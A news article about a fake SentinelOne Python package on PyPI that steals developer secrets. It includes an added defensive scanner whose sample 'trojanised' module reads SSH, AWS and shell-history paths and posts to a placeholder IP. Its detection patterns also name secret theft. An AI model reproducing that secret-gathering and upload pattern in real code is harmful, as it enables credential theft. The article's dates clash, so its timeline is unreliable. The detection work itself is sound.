Malicious Python package steals data from developers

January 4, 2023

Threat actors have published a malicious Python package on PyPI under the name SentinelOne. The package impersonates the legitimate SDK client of the trusted American cybersecurity company of that name, and its purpose is data harvesting.

The package does provide the expected functionality, giving a project quick access to the SentinelOne API. However, the threat actors trojanised it so that it also collects sensitive data from the developer systems it infects.

The researchers who discovered the package confirmed that it was malicious and reported it to PyPI and SentinelOne, allowing the SentinelOne admins to have the compromised package removed.

The hackers uploaded the Python package posing as SentinelOne's SDK earlier this month.

The malicious SentinelOne Python package was uploaded to PyPI in the first week of this month and has been updated numerous times since. Researchers state that the package is a copy of the legitimate SentinelOne SDK Python client.

In addition, the threat actors pushed several updates to refine and patch the package's malicious functionality.

Further analysis revealed that the fake SentinelOne package includes an api[.]py file containing malicious code that harvests data and uploads it to an IP address that does not belong to SentinelOne's infrastructure.

The malicious code behaves like infostealing malware, exporting developer-related information from every home directory on the infected device. The collected data includes Zsh and Bash histories, hosts files, SSH keys, AWS configuration, kube configuration, [.]gitconfig files, and more.

Researchers also believe the threat actors target developer infrastructure to gain further access to cloud servers and services, since these folders commonly contain auth tokens, API keys, and other secrets.
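The traits described above (reads of developer secret locations from every home directory, combined with an upload to a raw IP address that is not the vendor's) are enough to triage an installed package statically before it ever runs. The scanner below is an added example, not code from the article, from SentinelOne or from the malicious package: it walks a package's `.py` files and flags any module in which secret-path references co-occur with an egress call or a dotted-quad IP literal. The two sample modules, the `sentinel_sdk/` paths and the TEST-NET address `203.0.113.10` are all constructed for the demonstration.

```python
"""Static triage of a Python package for infostealer traits (added example).

Flags a module only when secret-location access co-occurs with network
egress or a hard-coded IP literal, which is the shape the article describes.
"""
import os
import re
from dataclasses import dataclass, field

# Developer artefacts the article lists as harvested by the trojanised package.
SENSITIVE_PATHS = {
    "shell history": re.compile(r"\.(?:zsh|bash)_history"),
    "hosts file": re.compile(r"/etc/hosts\b"),
    "ssh keys": re.compile(r"\.ssh\b"),
    "aws config": re.compile(r"\.aws\b"),
    "kube config": re.compile(r"\.kube\b"),
    "git config": re.compile(r"\.gitconfig\b"),
}
# Common ways Python code ships data off the host.
EGRESS_CALLS = re.compile(
    r"\b(?:requests\.(?:post|put|get)|urllib\.request\.urlopen|"
    r"http\.client\.HTTPS?Connection|socket\.socket)\s*\("
)
# A dotted-quad literal: an SDK talking to a raw IP instead of a vendor
# hostname is a strong signal. (Version strings like 1.2.3.4 also match;
# treat hits as leads, not verdicts.)
IP_LITERAL = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
# Enumerating every user's home directory rather than just the caller's.
HOME_WALK = re.compile(r"os\.listdir\(\s*['\"]/(?:home|Users)['\"]|pwd\.getpwall\(")


@dataclass
class Finding:
    path: str
    secrets: list = field(default_factory=list)
    egress: list = field(default_factory=list)
    ips: list = field(default_factory=list)
    home_walk: bool = False

    @property
    def is_suspicious(self) -> bool:
        # Reading secrets alone is normal for a CLI or cloud client; reading
        # them next to an upload call or a raw IP endpoint is not.
        return bool(self.secrets) and bool(self.egress or self.ips)


def scan_module(path: str, source: str) -> Finding:
    """Return the indicators found in one module's source text."""
    finding = Finding(path)
    for label, rx in SENSITIVE_PATHS.items():
        if rx.search(source):
            finding.secrets.append(label)
    finding.egress = sorted({m.group(0).rstrip("( \t") for m in EGRESS_CALLS.finditer(source)})
    finding.ips = sorted(set(IP_LITERAL.findall(source)))
    finding.home_walk = bool(HOME_WALK.search(source))
    return finding


def scan_package(files: dict) -> list:
    """Scan {path: source} and return findings, suspicious modules first."""
    findings = [scan_module(p, s) for p, s in files.items()]
    return sorted(findings, key=lambda f: (not f.is_suspicious, f.path))


def scan_installed(package_dir: str) -> list:
    """Scan a real directory, e.g. site-packages/<package>, on disk."""
    files = {}
    for root, _, names in os.walk(package_dir):
        for name in names:
            if name.endswith(".py"):
                full = os.path.join(root, name)
                with open(full, encoding="utf-8", errors="replace") as fh:
                    files[full] = fh.read()
    return scan_package(files)


# Constructed sample package: a benign client module and a trojanised one.
SAMPLE_PACKAGE = {
    "sentinel_sdk/client.py": '''
import requests
API = "https://api.example.invalid/v1"   # constructed placeholder endpoint
def get_agents(token):
    return requests.get(API + "/agents", headers={"Authorization": token}).json()
''',
    "sentinel_sdk/api.py": '''
import os, requests
TARGETS = (".bash_history", ".zsh_history", ".ssh", ".aws", ".kube", ".gitconfig")
def _homes():
    return [os.path.join("/home", u) for u in os.listdir("/home")]
def send(payload):
    requests.post("http://203.0.113.10/upload", data=payload)  # constructed IP
''',
}

if __name__ == "__main__":
    for f in scan_package(SAMPLE_PACKAGE):
        flag = "SUSPICIOUS" if f.is_suspicious else "ok"
        print(f"{flag:10} {f.path}: secrets={f.secrets} egress={f.egress} "
              f"ips={f.ips} home_walk={f.home_walk}")
```

Run `scan_installed(os.path.dirname(module.__file__))` against a freshly installed dependency before importing it anywhere; the benign client is reported as `ok` despite its `requests.get`, while the module that pairs secret-path references with an upload to a raw IP is ranked first as `SUSPICIOUS`.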

Some analysts also found that early variants of the package failed to run the data collection module on Linux systems; the authors fixed this in newer versions.

Based on reports, the same authors uploaded another five identically named packages between December 8 and 11 this year.

All published versions of the infostealing package were downloaded thousands of times from PyPI by different users. Researchers have yet to confirm whether the malicious package has been used in actual cyberattacks.
